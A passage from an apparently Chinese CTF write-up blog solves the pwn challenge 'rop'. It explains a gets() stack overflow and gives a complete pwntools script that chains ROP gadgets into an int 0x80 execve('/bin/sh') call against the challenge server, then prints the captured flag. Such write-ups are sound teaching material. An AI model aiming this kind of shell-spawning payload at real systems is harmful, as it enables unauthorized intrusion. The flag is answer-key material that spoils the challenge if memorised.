    gets(buf);

    return 0;
}

解题思路

题目没有system的地址,但通过ROPgadget可以知道eax,ebx,edx,ecx与int 0x80的地址,因此选择使用系统调用int 0x80 相当于执行execuve(“/bin/sh”)获取shell 此时eax的值为0xb,ebx的值为”/bin/sh”的地址,ecx,edx的值为0

解题脚本:

from pwn import *

#sh = process("./rop")

sh = remote("139.199.10.70",10007)

ppp_dcb_address = 0x0806eb90

p_eax = 0x080bb196 

bin_sh_address = 0x080be408

int_0x80_address = 0x08049421

payload = 'a'*(112) + p32(p_eax) + p32(0xb) + p32(ppp_dcb_address) + p32(0)+ p32(0) + p32(bin_sh_address) + p32(int_0x80_address)

time.sleep(4)

sh.sendline(payload)

sh.interactive()

#flag{48cddff6-994e-409e-bb27-7b7366454253}
  • flag
flag{48cddff6-994e-409e-bb27-7b7366454253}
本文总阅读量
× 文章目录
  1. 1. WEB
    1. 1.0.1. 1+1=?
    2. 1.0.2. 宁静致远
    3. 1.0.3. Gzmtu学生?
    4. 1.0.4. Who are you ?
    5. 1.0.5. EasyWeb
  • 2. MISC
    1. 2.0.1. 签到题
    2. 2.0.2. 小明的求助
    3. 2.0.3. 老烟枪
    4. 2.0.4. 抓黑客
    5. 2.0.5. 表白
  • 3. Reverse
    1. 3.0.1. Baby reverse
    2. 3.0.2. Easy reverse
    3. 3.0.3. 霸王别姬
      1. 3.0.3.0.1. 解法一 工具脱壳
      2. 3.0.3.0.2. 解法二 ESP定律法
  • 3.0.4. 电竞选手
  • 4. Cryptography
    1. 4.0.1. 恺撒将军
    2. 4.0.2. 小明家的小菜园
    3. 4.0.3. 战报
  • 5. Pwn
    1. 5.0.1. shellcode
    2. 5.0.2. simple_stackoverflow
    3. 5.0.3. rop